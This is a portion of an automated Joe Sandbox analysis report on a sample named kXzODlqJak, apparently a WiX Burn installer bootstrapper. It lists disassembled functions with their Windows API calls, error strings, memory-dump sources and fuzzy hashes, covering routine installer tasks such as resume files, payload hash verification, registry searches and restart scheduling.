                                                                                                                                                                                                                                                                            • Instruction ID: 5976eccb983baf2c4889dbccf5542cca47749d66c3ef830a731596790d34ddf6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 16be3e66dc237a945e8b05ebb80d35e76b65a9b17bf97a2119bb534e719bd180
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71518D71E01228AFDB12CFA9CC89AAEBBB4FF49714F014055EA04EB291D3709940CFA1
                                                                                                                                                                                                                                                                            Function 00947CA4 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 140fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,?,?,?,?,WiX\Burn,DownloadTimeout,00000078), ref: 00947D2E
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00947D3B
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000008,00000008,?,00000000), ref: 00947D92
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00947DC6
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp), ref: 00947E18
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFileLast$CloseCreateHandleRead
                                                                                                                                                                                                                                                                            • String ID: %ls.R$Failed to calculate resume path from working path: %ls$Failed to create resume file: %ls$Failed to create resume path.$Failed to read resume file: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 3160720760-1800406086
                                                                                                                                                                                                                                                                            • Opcode ID: 08263a09e067447d4e3ed2b8e203577b1f25d9f57c5437435be869de3555978f
                                                                                                                                                                                                                                                                            • Instruction ID: 5b4ee0cffdee47ffaa8b0ac98aff6f75d7a66ed0cdbb99b8a6a618e8fe11edf6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08263a09e067447d4e3ed2b8e203577b1f25d9f57c5437435be869de3555978f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B641F872A54218BBDB318AD9CC4AF6ABA68EF45721F114155FE14EB2C1E3B08C00C6A1
                                                                                                                                                                                                                                                                            Function 008FE314 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 137fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000), ref: 008FE331
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FE341
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 008FE48D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                            • String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$Payload has no verification information: %ls$d:\a\wix4\wix4\src\burn\engine\cache.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 2528220319-660701767
                                                                                                                                                                                                                                                                            • Opcode ID: 3bbbd2323e85be755629ed8abf01afe1b8034c35d6617fe512ef111bcc5423bf
                                                                                                                                                                                                                                                                            • Instruction ID: 5b374d5a2d37371e550a86e6c6bd52d29c44d2705bb370a70e700f1b6698c9b5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3bbbd2323e85be755629ed8abf01afe1b8034c35d6617fe512ef111bcc5423bf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2941BB32680219BBDF225E959C0AFBF3D29FB55B15F144114FF04BA1E1D2B2C820A7A5
                                                                                                                                                                                                                                                                            Function 008E6A25 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 120sleepshutdownCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(SeShutdownPrivilege,?,00000000,00000001,A0000005,?,008E8015,?,?,?,?,?,?), ref: 008E6A39
                                                                                                                                                                                                                                                                              • Part of subcall function 0093B884: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0093B8BC
                                                                                                                                                                                                                                                                              • Part of subcall function 0093B884: GetLastError.KERNEL32 ref: 0093B8C6
                                                                                                                                                                                                                                                                              • Part of subcall function 0093B884: CloseHandle.KERNEL32(00000000), ref: 0093B9DD
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,?,00000001,00000000,?,008E8015,?,?,?,?,?,?), ref: 008E6A8C
                                                                                                                                                                                                                                                                            • InitiateSystemShutdownExW.ADVAPI32(?,008E8015,?,?,?,?), ref: 008E6AAB
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,008E8015,?,?,?,?,?,?), ref: 008E6AB1
                                                                                                                                                                                                                                                                              • Part of subcall function 009060F9: EnterCriticalSection.KERNEL32(?,00000000,00000000,?,008E6A7F,?,00000001,00000000,?,008E8015,?,?,?,?,?,?), ref: 00906108
                                                                                                                                                                                                                                                                              • Part of subcall function 009060F9: LeaveCriticalSection.KERNEL32(?,?,008E6A7F,?,00000001,00000000,?,008E8015,?,?,?,?,?,?), ref: 00906129
                                                                                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 008E6B21
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000000FA,?,008E8015,?,?,?,?,?,?), ref: 008E6B3B
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000000FA,?,008E8015,?,?,?,?,?,?), ref: 008E6B70
                                                                                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 008E6B7C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Sleep$CriticalErrorLastSectionWindow$CloseCurrentEnterHandleInitiateLeaveLookupPrivilegeProcessShutdownSystemValue
                                                                                                                                                                                                                                                                            • String ID: Failed to enable shutdown privilege in process token.$Failed to schedule restart.$SeShutdownPrivilege$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2197606043-2157809017
                                                                                                                                                                                                                                                                            • Opcode ID: 47bb1d6bf4979d169b36e5fc6e2ac1ea9405046c4b5ee841a0bdd293f9c0bc5d
                                                                                                                                                                                                                                                                            • Instruction ID: 5d2b0d9b026c01e1c3f559bd310c1d75888f735cdf3ec88305bec34db68d1dec
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47bb1d6bf4979d169b36e5fc6e2ac1ea9405046c4b5ee841a0bdd293f9c0bc5d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1316B75B40355BBEB109B5B9C8AF5E362CFB93BA4F044034FE08EB181FA709C1096A0
                                                                                                                                                                                                                                                                            Function 0090D72B Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 111threadCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetProcessShutdownParameters.KERNEL32(000003FF,00000000,?,00000000,?,?,?,?,00000000,00000001), ref: 0090D74C
                                                                                                                                                                                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0090D757
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0090D764
                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0090D370,?,00000000,00000000), ref: 0090D7CC
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0090D7D9
                                                                                                                                                                                                                                                                            • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FF), ref: 0090D81F
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0090D838
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0090D849
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsParametersProcessShutdownThreadWait
                                                                                                                                                                                                                                                                            • String ID: Failed to create initialization event.$Failed to create the UI thread.$d:\a\wix4\wix4\src\burn\engine\uithread.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 665835008-3210454806
                                                                                                                                                                                                                                                                            • Opcode ID: f76f1a10bc92658fa8433ce69760650b9e2d45f969aeaecd28e110265940ca0b
                                                                                                                                                                                                                                                                            • Instruction ID: 9db702097f621c3a2f410e15747a4ca3564e765200cd8ef78d224cf9a973152d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f76f1a10bc92658fa8433ce69760650b9e2d45f969aeaecd28e110265940ca0b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7831D2B6D41225BFD7119BE98C89FAFBABCBF05750F104065BA14F72C0E6709E009AA1
                                                                                                                                                                                                                                                                            Function 008EA2EB Relevance: 19.8, APIs: 2, Strings: 11, Instructions: 293COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,00000024,00000001,00000001,00000000,?,000000F8,00000001,00000000,000000F8,00000024,?,00000000,?), ref: 008EA317
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 008EA61A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to parse variable value as version., xrefs: 008EA51F
                                                                                                                                                                                                                                                                            • Failed to read variable value as number., xrefs: 008EA580
                                                                                                                                                                                                                                                                            • Unsupported variable type., xrefs: 008EA54D
                                                                                                                                                                                                                                                                            • Failed to read variable name., xrefs: 008EA5E4
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008EA60A
                                                                                                                                                                                                                                                                            • Failed to read variable included flag., xrefs: 008EA5F8
                                                                                                                                                                                                                                                                            • Failed to read variable value as string., xrefs: 008EA536, 008EA5A8
                                                                                                                                                                                                                                                                            • Failed to set variable., xrefs: 008EA5BC
                                                                                                                                                                                                                                                                            • Failed to set variable value., xrefs: 008EA508, 008EA569, 008EA594
                                                                                                                                                                                                                                                                            • Failed to read variable value type., xrefs: 008EA5D0
                                                                                                                                                                                                                                                                            • Failed to read variable count., xrefs: 008EA337
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: Failed to parse variable value as version.$Failed to read variable count.$Failed to read variable included flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable value.$Failed to set variable.$Unsupported variable type.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-1722372363
                                                                                                                                                                                                                                                                            • Opcode ID: e7e461b4093878fcfe5b9853991ccdcb7d3c898d384056b4914dfdd8ea558420
                                                                                                                                                                                                                                                                            • Instruction ID: 64a88c0da14901de2e183ffe9a819e53867bc60f143cf797c7c5b078ca7815ec
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7e461b4093878fcfe5b9853991ccdcb7d3c898d384056b4914dfdd8ea558420
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4691D731D4026DBBEB269A95CC4AFEF7A68FB17F55F150011BA00FA1D0D2B0AE448B56
                                                                                                                                                                                                                                                                            Function 0093C5BE Relevance: 19.5, APIs: 3, Strings: 8, Instructions: 204registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000), ref: 0093C811
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to concatenate paths while recursively deleting subkeys. Path1: %ls, Path2: %ls$Failed to delete registry key (ex).$Failed to delete registry key.$Failed to enumerate key 0$Failed to open this key for enumerating subkeys: %ls$Failed to recursively delete subkey: %ls$RegInitialize must be called first in order to RegDelete() a key with non-default bit attributes!$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-329788176
                                                                                                                                                                                                                                                                            • Opcode ID: 4a95705c0aab69785b909a8286e5f69066b6bc1e7f61a5d48e3985ff7cd49b02
                                                                                                                                                                                                                                                                            • Instruction ID: e7c90187f92f4cab6fbee5ee59a579aaed6b8daaa0974a025891fcb69893fe37
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a95705c0aab69785b909a8286e5f69066b6bc1e7f61a5d48e3985ff7cd49b02
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 375113B7D40A34B7DB316A948C4EFAE6A68EB45B54F018020FE057B290D7B44E40EFE1
                                                                                                                                                                                                                                                                            Function 008F1295 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 169registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,008E6DEA,00000000,C95B5EC6,00000000,00000000,00000000,54B7FF10,008E6DEA,00000001,00000001,008E6CF2,00000000,8D000001,008E6DEA), ref: 008F1472
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 008F144A
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\search.cpp, xrefs: 008F132D, 008F13D2, 008F13D7, 008F13EF, 008F1436
                                                                                                                                                                                                                                                                            • Failed to open registry key. Key = '%ls', xrefs: 008F131B
                                                                                                                                                                                                                                                                            • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 008F13F8
                                                                                                                                                                                                                                                                            • Registry key not found. Key = '%ls', xrefs: 008F1346
                                                                                                                                                                                                                                                                            • Failed to format key string., xrefs: 008F12C5
                                                                                                                                                                                                                                                                            • Failed to query registry key value., xrefs: 008F13DD
                                                                                                                                                                                                                                                                            • Failed to set variable., xrefs: 008F1424
                                                                                                                                                                                                                                                                            • Failed to format value string., xrefs: 008F137B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$d:\a\wix4\wix4\src\burn\engine\search.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-2242727714
                                                                                                                                                                                                                                                                            • Opcode ID: e5c9f0b25af86648f61ceaf5aa170470941aae8c21f7a537f7f84583cbf04c65
                                                                                                                                                                                                                                                                            • Instruction ID: 23ea77f065c933bb615ee86c0e3f3a0df42f56012840bc854c309e630ea4c877
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e5c9f0b25af86648f61ceaf5aa170470941aae8c21f7a537f7f84583cbf04c65
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2512831E40629FBEF129AA58C0FFBABA29FF14B15F014124BF00FA5D1E3B19D509691
                                                                                                                                                                                                                                                                            Function 0094A73B Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 153COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: GetProcessHeap.KERNEL32(?,00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E541C
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: RtlAllocateHeap.NTDLL(00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E5423
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 0094A8B1
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 0094A8C0
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 0094A8CF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 0094A763, 0094A76E, 0094A783, 0094A7CE
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM unknown attribute name., xrefs: 0094A833
                                                                                                                                                                                                                                                                            • Failed to get unknown attribute value., xrefs: 0094A854
                                                                                                                                                                                                                                                                            • Failed to allocate unknown attribute., xrefs: 0094A774
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM unknown attribute namespace., xrefs: 0094A7BF
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM unknown attribute value., xrefs: 0094A87C
                                                                                                                                                                                                                                                                            • Failed to get unknown attribute namespace., xrefs: 0094A7E0
                                                                                                                                                                                                                                                                            • Failed to get unknown attribute name., xrefs: 0094A80E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeString$Heap$AllocateProcess
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate ATOM unknown attribute name.$Failed to allocate ATOM unknown attribute namespace.$Failed to allocate ATOM unknown attribute value.$Failed to allocate unknown attribute.$Failed to get unknown attribute name.$Failed to get unknown attribute namespace.$Failed to get unknown attribute value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2724874077-797782994
                                                                                                                                                                                                                                                                            • Opcode ID: 3c6c565e55a737a18678ade96332ee9d9553e9629d1ea13a3c9c3fddddbec305
                                                                                                                                                                                                                                                                            • Instruction ID: cf1c2e71d556059db3fb8e6628b5cf448dbbc5ad9f65f714f8a451b5223642c7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c6c565e55a737a18678ade96332ee9d9553e9629d1ea13a3c9c3fddddbec305
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2341E771EC0325BBEB329B558C4EF6F7A68EB41B54F0141A0F704BB2C1E6B49D018A91
                                                                                                                                                                                                                                                                            Function 0094234B Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 138COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetSystemWindowsDirectoryW.KERNEL32(00000000,00000105), ref: 00942390
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00946531,TEMP,00000000,80000002,System\CurrentControlSet\Control\Session Manager\Environment,00020019), ref: 0094239C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to realloc Windows directory path., xrefs: 009423F2
                                                                                                                                                                                                                                                                            • Failed to terminate Windows directory path with backslash., xrefs: 0094249D
                                                                                                                                                                                                                                                                            • Failed to concat subdirectory on Windows directory path., xrefs: 00942477
                                                                                                                                                                                                                                                                            • Failed to get Windows directory path with returned size., xrefs: 00942444
                                                                                                                                                                                                                                                                            • Failed to alloc Windows directory path., xrefs: 0094236A
                                                                                                                                                                                                                                                                            • Failed to get Windows directory path with default size., xrefs: 009423CC
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp, xrefs: 00942379, 009423C0, 009423C6, 009423D7, 00942439, 0094243E, 009424AC
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
